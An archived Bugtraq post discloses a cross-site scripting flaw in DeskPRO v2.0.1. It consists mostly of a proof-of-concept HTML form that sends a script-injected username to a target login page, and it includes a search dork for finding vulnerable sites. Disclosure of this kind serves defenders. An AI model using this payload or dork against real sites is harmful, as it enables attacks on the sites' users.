Bugtraq mailing list archives
DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability
From: john () martinelli com
Date: 8 Apr 2007 15:04:15 -0000
<!-- DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability Vulnerable: DeskPRO v2.0.1 (other versions should also be vulnerable) Google d0rk: intitle:"Powered by DeskPRO" John Martinelli john () martinelli com http://john-martinelli.com April 8th, 2007 !--> <html> <head><title>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</title><body> <center><br><br><font size=4>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a></font><br> <br><br> <form action="http://target.com/login.php" method="post"> <input type=hidden name="login_form" value="login"> <input type=hidden name="_getvars" value="getvars"> <input type=hidden name="_postvars" value="postvars"> <input type=hidden name="_filevars" value="filevars"> <input type=hidden name="password" value="password"> <input type=hidden name="remember" value=0> <input name="username" size=75 value="<"<<script>alert(1);</script>"> <input type=submit value="Execute XSS Attack" class="button"> </form> </body></html>
Current thread:
- DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability john (Apr 09)